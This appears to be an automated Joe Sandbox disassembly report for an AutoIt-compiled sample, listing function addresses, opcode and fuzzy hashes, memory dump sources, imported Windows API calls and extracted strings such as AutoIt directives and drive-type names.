                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: f39ab6630c8744d0eac5d88b890be2ebcb45c0305cc5c80ea53b9fe7babbb576
                                            • Instruction ID: 969c9ad57e12d60403dec3ceef5c2e0eaeb6b6abbd23a3e5663499513320bf94
                                            • Opcode Fuzzy Hash: f39ab6630c8744d0eac5d88b890be2ebcb45c0305cc5c80ea53b9fe7babbb576
                                            • Instruction Fuzzy Hash: 84A0113000020CAB8F002B8AEC088883F2CFA002A0B008020F80C00220AB22A8208B82
                                            Function 0080E3B0 Relevance: .5, Instructions: 540COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c3967a89bd71fd1ee3e819edb83c4a9cde052adc4e2d049ea24b76a7a1f21e8b
                                            • Instruction ID: dc9559eb309fa82419eb8c4819e6eb8312256492edb447356516428d3d68bc0a
                                            • Opcode Fuzzy Hash: c3967a89bd71fd1ee3e819edb83c4a9cde052adc4e2d049ea24b76a7a1f21e8b
                                            • Instruction Fuzzy Hash: 9B22A070904219CFDB64DF58C880AAAB7F1FF18314F14C86AD99ADB391E735A981CB91
                                            Function 008093F0 Relevance: .5, Instructions: 531COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea563145f585c28b2309eb0b446fcc59ff2b1222f335e598abc6eb83a99a9ad8
                                            • Instruction ID: 4ce4fb273997287214f0c90d5cfebb2927f2d243a5eb73299d5256bacd04bcb0
                                            • Opcode Fuzzy Hash: ea563145f585c28b2309eb0b446fcc59ff2b1222f335e598abc6eb83a99a9ad8
                                            • Instruction Fuzzy Hash: A912BE70A002099FDF44DFA8DD81AEEB7F5FF48300F108529E856E7295EB36A920CB55
                                            Function 0080AF50 Relevance: .5, Instructions: 514COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Exception@8Throwstd::exception::exception
                                            • String ID:
                                            • API String ID: 3728558374-0
                                            • Opcode ID: 7b2bda881ea2ddca1316e34146df5d6a46157ae7274defb50c6e21d9efdad067
                                            • Instruction ID: a0aea26ee655440a7714cc1be48d548f198550106a08afbc5354025ce68dc050
                                            • Opcode Fuzzy Hash: 7b2bda881ea2ddca1316e34146df5d6a46157ae7274defb50c6e21d9efdad067
                                            • Instruction Fuzzy Hash: 0102C170A00209DFCF54DF68D991AAEBBB5FF44310F10C069E80ADB295EB35DA51CB96
                                            Function 008202A4 Relevance: .3, Instructions: 345COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                            • Instruction ID: fa7261eeb96298c440e3fbf9e4eccd0555634d253891a65a6be2a8072424afe8
                                            • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                            • Instruction Fuzzy Hash: 48C1C5322051A30ADF2D4639943447EBAA1EEA17B571A076DD8B2CF5D3FF20D5A4DA20
                                            Function 008206D9 Relevance: .3, Instructions: 341COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                            • Instruction ID: 734493f2e9f0e62817ba29e374cf6aa26f56780e2b94d5f0578588022bf6a27b
                                            • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                            • Instruction Fuzzy Hash: DAC1B4322051A30ADF2D4639943447EBAA1EEA27B171A076DD4B3CF5D7FF20D5A4DA20
                                            Function 0081FA57 Relevance: .3, Instructions: 323COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction ID: 958bc207d47ee93de976bc3f2cdc5dd48b508548a3f0c267f1bc1766d699b37e
                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction Fuzzy Hash: 4AC1C1322090A309DF2D4639D4304BEBAA5AEA27B571A077DD5B2CF4D7FF20D5A4D620
                                            Function 011B4120 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                            • Instruction ID: 69023e60983705d0a7e71569d814da61c1e41a73afff856dc419f64dfc387c08
                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                            • Instruction Fuzzy Hash: 4841D371D1051CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                            Function 011B4010 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                            • Instruction ID: 2d20d1d7fc9d9ec71d5363c4e7cc85eff495ebc2cac86be8e3b39b85ce1c7fa2
                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                            • Instruction Fuzzy Hash: 40019278A11109EFCB48DF98C5909AEF7B5FB48310F208599E819A7701D731AE51DB80
                                            Function 011B3FB0 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                            • Instruction ID: c6b2e56d88f59a9c9d3a0c416231c64c42cb8d40f085379b1adc4a10a7e1b61c
                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                            • Instruction Fuzzy Hash: D7019278A15109EFCB48DF98C5909AEF7B5FB48310F208599E819A7701D730AE51DB81
                                            Function 011B2990 Relevance: .0, Instructions: 6COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                            Function 0085A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DeleteObject.GDI32(00000000), ref: 0085A2FE
                                            • DeleteObject.GDI32(00000000), ref: 0085A310
                                            • DestroyWindow.USER32 ref: 0085A31E
                                            • GetDesktopWindow.USER32 ref: 0085A338
                                            • GetWindowRect.USER32(00000000), ref: 0085A33F
                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0085A480
                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0085A490
                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A4D8
                                            • GetClientRect.USER32(00000000,?), ref: 0085A4E4
                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0085A51E
                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A540
                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A553
                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A55E
                                            • GlobalLock.KERNEL32(00000000), ref: 0085A567
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A576
                                            • GlobalUnlock.KERNEL32(00000000), ref: 0085A57F
                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A586
                                            • GlobalFree.KERNEL32(00000000), ref: 0085A591
                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A5A3
                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0088D9BC,00000000), ref: 0085A5B9
                                            • GlobalFree.KERNEL32(00000000), ref: 0085A5C9
                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0085A5EF
                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0085A60E
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A630
                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A81D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                            • String ID: $AutoIt v3$DISPLAY$static
                                            • API String ID: 2211948467-2373415609
                                            • Opcode ID: 81554e2ed7a7446623494d52985d419d484658071f7a520b6ac6f90740945ca4
                                            • Instruction ID: 718bc8410cad5766c9001beae47b2cb466a78078fc52696ebfd796ec91375ba4
                                            • Opcode Fuzzy Hash: 81554e2ed7a7446623494d52985d419d484658071f7a520b6ac6f90740945ca4
                                            • Instruction Fuzzy Hash: D4026D75900218AFDB14DFA8CD89EAE7BB9FF49311F008258F915EB2A1D770AD41CB61
                                            Function 0086D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetTextColor.GDI32(?,00000000), ref: 0086D2DB
                                            • GetSysColorBrush.USER32(0000000F), ref: 0086D30C
                                            • GetSysColor.USER32(0000000F), ref: 0086D318
                                            • SetBkColor.GDI32(?,000000FF), ref: 0086D332
                                            • SelectObject.GDI32(?,00000000), ref: 0086D341
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0086D36C
                                            • GetSysColor.USER32(00000010), ref: 0086D374
                                            • CreateSolidBrush.GDI32(00000000), ref: 0086D37B
                                            • FrameRect.USER32(?,?,00000000), ref: 0086D38A
                                            • DeleteObject.GDI32(00000000), ref: 0086D391
                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0086D3DC
                                            • FillRect.USER32(?,?,00000000), ref: 0086D40E
                                            • GetWindowLongW.USER32(?,000000F0), ref: 0086D439
                                              • Part of subcall function 0086D575: GetSysColor.USER32(00000012), ref: 0086D5AE
                                              • Part of subcall function 0086D575: SetTextColor.GDI32(?,?), ref: 0086D5B2
                                              • Part of subcall function 0086D575: GetSysColorBrush.USER32(0000000F), ref: 0086D5C8
                                              • Part of subcall function 0086D575: GetSysColor.USER32(0000000F), ref: 0086D5D3
                                              • Part of subcall function 0086D575: GetSysColor.USER32(00000011), ref: 0086D5F0
                                              • Part of subcall function 0086D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0086D5FE
                                              • Part of subcall function 0086D575: SelectObject.GDI32(?,00000000), ref: 0086D60F
                                              • Part of subcall function 0086D575: SetBkColor.GDI32(?,00000000), ref: 0086D618
                                              • Part of subcall function 0086D575: SelectObject.GDI32(?,?), ref: 0086D625
                                              • Part of subcall function 0086D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0086D644
                                              • Part of subcall function 0086D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0086D65B
                                              • Part of subcall function 0086D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0086D670
                                              • Part of subcall function 0086D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0086D698
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                            • String ID:
                                            • API String ID: 3521893082-0
                                            • Opcode ID: 3a1934c23d1c441ac4b75577b48af3ab0a8da98f593b0faeb5ac7f1d36617381
                                            • Instruction ID: 611e100b2c9fe51b39d0b6070a75140274e0952a0c3fbc0072bd4a2198c0f315
                                            • Opcode Fuzzy Hash: 3a1934c23d1c441ac4b75577b48af3ab0a8da98f593b0faeb5ac7f1d36617381
                                            • Instruction Fuzzy Hash: D9918C72508305EFCB10AF68DC48E6BBBA9FF89325F100A19F962D61E0D731D944CB92
                                            Function 0081B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DestroyWindow.USER32 ref: 0081B98B
                                            • DeleteObject.GDI32(00000000), ref: 0081B9CD
                                            • DeleteObject.GDI32(00000000), ref: 0081B9D8
                                            • DestroyIcon.USER32(00000000), ref: 0081B9E3
                                            • DestroyWindow.USER32(00000000), ref: 0081B9EE
                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0087D2AA
                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0087D2E3
                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0087D711
                                              • Part of subcall function 0081B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0081B759,?,00000000,?,?,?,?,0081B72B,00000000,?), ref: 0081BA58
                                            • SendMessageW.USER32 ref: 0087D758
                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0087D76F
                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0087D785
                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0087D790
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                            • String ID: 0
                                            • API String ID: 464785882-4108050209
                                            • Opcode ID: b07b9e9661bc914b44157fed6a77ea1b235cff5f82fed4248e0d064faba4444a
                                            • Instruction ID: f3ea5ea517a6d05a1f7cc10eb5349f0752512d681aac88e6333582e27afba89a
                                            • Opcode Fuzzy Hash: b07b9e9661bc914b44157fed6a77ea1b235cff5f82fed4248e0d064faba4444a
                                            • Instruction Fuzzy Hash: FA127C70204305DFDB25CF28C884BA9BBF5FF55304F148569E989CB666D731E882CB92
                                            Function 0084DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 0084DBD6
                                            • GetDriveTypeW.KERNEL32(?,0089DC54,?,\\.\,0089DC00), ref: 0084DCC3
                                            • SetErrorMode.KERNEL32(00000000,0089DC54,?,\\.\,0089DC00), ref: 0084DE29
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorMode$DriveType
                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                            • API String ID: 2907320926-4222207086
                                            • Opcode ID: c3228de4793d7dac10cd66ba95f7e1e3dd6c182b36a3e3eb5d2e377fc2808918
                                            • Instruction ID: 3d6164766c173de2b88987a326a17a71f2800fab177da6b8ac5bf0e68a5b8d4a
                                            • Opcode Fuzzy Hash: c3228de4793d7dac10cd66ba95f7e1e3dd6c182b36a3e3eb5d2e377fc2808918
                                            • Instruction Fuzzy Hash: AE519E3064830EEBC610EF14CC92A69B7A0FB94718B10591EF467D73D5DB74E945DB42
                                            Function 0080CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                            • API String ID: 1038674560-86951937
                                            • Opcode ID: 4c9bae77d7fa74ebc84a89be3e1544a11405cdc0978805507053d9473dd72147
                                            • Instruction ID: 88760d0cf3f6830e6bb9396ebf1af36423dab675dfcf02b3279000baedfeb823
                                            • Opcode Fuzzy Hash: 4c9bae77d7fa74ebc84a89be3e1544a11405cdc0978805507053d9473dd72147
                                            • Instruction Fuzzy Hash: 1B81E771640219BBDF64BF68DC92FAE3768FF24304F144138F909E61C6EB64DA41C6A6
                                            Function 0086C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0086C788
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0086C83E
                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 0086C859
                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0086CB15
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window
                                            • String ID: 0
                                            • API String ID: 2326795674-4108050209
                                            • Opcode ID: 1a58fa8ce9cf1ee3792b77877eb493e35b8654e8afeb12135e9096b83be4fa99
                                            • Instruction ID: 7fb7954c15ccaa7bcb77af8309c6a7f7377d29173c715f5156a6ba2683f7d68a
                                            • Opcode Fuzzy Hash: 1a58fa8ce9cf1ee3792b77877eb493e35b8654e8afeb12135e9096b83be4fa99
                                            • Instruction Fuzzy Hash: D7F1EFB1204305AFE7218F28C889BBABBE4FF49354F09062DF5D8D62A1D774D944DB92
                                            Function 0086638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharUpperBuffW.USER32(?,?,0089DC00), ref: 00866449
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
